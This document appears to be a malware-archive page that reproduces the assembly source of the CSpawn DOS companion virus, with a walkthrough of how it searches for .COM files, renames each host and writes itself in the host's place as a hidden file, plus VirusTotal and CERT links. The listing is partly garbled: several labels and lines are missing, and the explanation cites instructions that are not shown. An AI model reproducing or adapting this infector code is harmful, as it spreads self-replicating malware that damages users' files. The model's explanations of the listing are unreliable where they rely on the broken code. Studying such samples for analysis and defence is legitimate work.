aka Virus.DOS.Companion.180 (Kaspersky)

Source Code

;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;(C) 1994 American Eagle Publications, Inc. All Rights Reserved!

.model tiny
org  0100h

        mov     sp,OFFSET FINISH + 100H  ;Change top of stack
        mov     ah,4AH                    ;DOS resize memory fctn
        mov     bx,sp
        mov     cl,4
        shr     bx,cl                     ;BX=# of para to keep
        inc     bx
        int     21H                       ;set up EXEC param block

        mov     bx,2CH
        mov     ax,[bx]
        mov     WORD PTR [PARAM_BLK],ax   ;environment segment
        mov     ax,cs
        mov     WORD PTR [PARAM_BLK+4],ax ;@ of parameter string
        mov     WORD PTR [PARAM_BLK+8],ax ;@ of FCB1
        mov     WORD PTR [PARAM_BLK+12],ax;@ of FCB2

        mov     dx,OFFSET REAL_NAME       ;prep to EXEC
        mov     bx,OFFSET PARAM_BLK
        mov     ax,4B00H
        int     21H                       ;execute host

        mov     bx,ax                     ;save return code here
        mov     ax,cs                     ;AX holds code segment
        mov     ss,ax                     ;restore stack first
        mov     sp,(FINISH - CSpawn) + 200H
        push    bx
        mov     ds,ax                     ;Restore data segment
        mov     es,ax                     ;Restore extra segment

        mov     ah,1AH
        mov     dx,80H
        int     21H                       ;DOS set DTA function
                                          ;put DTA at offset 80H
        call    FIND_FILES                ;Find and infect files

        pop     ax                        ;AL holds return value
        mov     ah,4CH
        int     21H                       ;DOS terminate function

;The following routine searches for COM files and infects them
        mov     dx,OFFSET COM_MASK        ;search for COM files
        mov     ah,4EH
        xor     cx,cx                     ;CX holds all file attributes
        int     21H
        jc      FIND_DONE                 ;Exit if no files found
        call    INFECT_FILE               ;Infect the file!
        mov     ah,4FH
        jmp     FIND_LOOP                 ;Try finding another file
        ret                               ;Return to caller

COM_MASK db      '*.COM',0        ;COM file search mask

;This routine infects the file specified in the DTA.
        mov     si,9EH                    ;DTA + 1EH
        mov     di,OFFSET REAL_NAME       ;DI points to new name
        or       al,al
        jnz      INF_LOOP                 ;Is it a NULL?
        mov      WORD PTR [di-21],'N'
        mov     dx,9EH
        mov     di,OFFSET REAL_NAME
        mov     ah,56H
        int     21H                       ;rename original file
        jc       INF_EXIT                 ;if can’t rename, already done

        mov     ah,3CH
        mov     cx,2
        int     21H                       ;DOS create file function
                                          ;set hidden attribute

        mov     bx,ax                     ;BX holds file handle
        mov     ah,40H
        mov     cx,FINISH - CSpawn
        mov     dx,OFFSET CSpawn
        int     21H                       ;DOS write to file function

        mov     ah,3EH
        int     21H                       ;DOS close file function


REAL_NAME db      13 dup (?)
                                  ;Name of host to execute
;DOS EXEC function parameter block
PARAM_BLK DW ?             ;environment segment
          DD 80H           ;@ of command line
          DD 5CH           ;@ of first FCB
          DD 6CH           ;@ of second FCB


end CSpawn


  1. Program Setup and Memory Management:

    • .model tiny and .code set up the assembly language environment for a small, single-segment program.
    • org 0100h specifies the program’s starting offset, a standard for DOS .COM files.
    • The initial code adjusts the stack pointer and resizes the memory block to fit the virus, ensuring it has enough space to operate.
  2. Execution Parameter Block Setup:

    • The code sets up a DOS EXEC function parameter block (PARAM_BLK). This is used to execute the host program after the virus runs.
  3. Launching the Original Program:

    • The virus locates and prepares to execute the original program (the one it is attached to) using a DOS function call (int 21H with ah=4B00H).
  4. System State Preservation:

    • It saves and later restores critical system state information (like registers and stack pointers) to ensure smooth execution of both the virus and the host program.
  5. File Search and Infection Routine:

    • FIND_FILES: Searches for .COM files in the current directory.
    • It uses DOS interrupts to find (int 21H with ah=4EH) and loop through files (int 21H with ah=4FH).
  6. Infection Mechanism:

    • INFECT_FILE: When a .COM file is found, this routine is called to infect it.
    • It renames the original file and creates a new file with the original name, which is actually the virus.
    • The virus writes its own code to the new file and sets it as hidden.
  7. Termination:

    • After infecting files, it restores the original return code from the host program and terminates itself using the DOS terminate function (int 21H with ah=4CH).
  8. Data and Strings:

    • COM_MASK, REAL_NAME, and PARAM_BLK are data used for file searching, storing the original file name, and holding execution parameters, respectively.

This virus demonstrates a classic companion virus strategy: it attaches itself to executable files and runs itself first, potentially performing malicious actions, before running the original executable. It’s a good example of early virus coding techniques and DOS system programming.


File Search and Infection Routine

    mov     dx,OFFSET COM_MASK        ; search for COM files
    mov     ah,4EH
    xor     cx,cx                     ; CX holds all file attributes
    int     21H
    jc      FIND_DONE                 ; Exit if no files found
    call    INFECT_FILE               ; Infect the file!
    mov     ah,4FH
    jmp     FIND_LOOP                 ; Try finding another file
    ret                               ; Return to caller

COM_MASK db      '*.COM',0            ; COM file search mask` 

Detailed Explanation

  • Initializing File Search:

    • mov dx,OFFSET COM_MASK: Sets up the DX register to point to the string '*.COM', which is the search pattern for finding .COM files.
    • mov ah,4EH and xor cx,cx: Prepares for a DOS function call to find the first file matching the .COM pattern. AH=4EH is the DOS function for “Find First File”, and CX is cleared to 0 to search for files with any attribute (including hidden, system, etc.).
  • Searching Loop:

    • int 21H: This interrupt call performs the actual file search.
    • jc FIND_DONE: If the ‘carry flag’ is set (indicated by jc, jump if carry), no more files are found, and the routine exits.
    • call INFECT_FILE: Calls the routine to infect the found file.
    • mov ah,4FH: Prepares for the “Find Next File” DOS function.
    • The jmp FIND_LOOP causes the program to loop back and search for the next .COM file.

Infection Mechanism

Code Overview

    mov     si,9EH                    ; DTA + 1EH
    mov     di,OFFSET REAL_NAME       ; DI points to new name
    or       al,al
    jnz      INF_LOOP                 ; Is it a NULL?
    mov      WORD PTR [di-21],'N'
    mov     dx,9EH
    mov     di,OFFSET REAL_NAME
    mov     ah,56H
    int     21H                       ; rename original file
    jc       INF_EXIT                 ; if can’t rename, already done

    mov     ah,3CH
    mov     cx,2
    int     21H                       ; DOS create file function
                                      ; set hidden attribute

    mov     bx,ax                     ; BX holds file handle
    mov     ah,40H
    mov     cx,FINISH - CSpawn
    mov     dx,OFFSET CSpawn
    int     21H                       ; DOS write to file function

    mov     ah,3EH
    int     21H                       ; DOS close file function


Detailed Explanation

  • Copying the File Name:

    • The INFECT_FILE routine begins by setting up SI and DI registers to point to the location of the file name in the Disk Transfer Area (DTA) and a buffer (REAL_NAME), respectively.
    • The INF_LOOP copies the file name from the DTA to REAL_NAME byte by byte (using lodsb and stosb). The loop continues until it encounters a NULL byte, indicating the end of the file name.
  • Renaming the Original File:

    • After copying the file name, the code modifies the name slightly (mov WORD PTR [di-21],'N') to avoid overwriting the original file.
    • It then renames the original file using int 21H with ah=56H (DOS rename file function).
  • Creating the Infected File:

    • mov ah,3CH and mov cx,2: Sets up for the DOS create file function with the hidden attribute.
    • The virus then creates a new file with the original file’s name.
  • Writing the Virus to the New File:

    • The file handle returned from the file creation is in AX and moved to BX.
    • mov ah,40H: Prepares for the DOS write file function.
    • The virus writes its own code (CSpawn) into the new file.
  • Closing the File:

    • Finally, the file is closed using int 21H with `ah=3EH
  • https://www.virustotal.com/gui/file/1595635f489d129b6cb2a3f336b00af946eadefc23650493ac4ba4c751bc6eae
  • https://mwdb.cert.pl/file/1595635f489d129b6cb2a3f336b00af946eadefc23650493ac4ba4c751bc6eae

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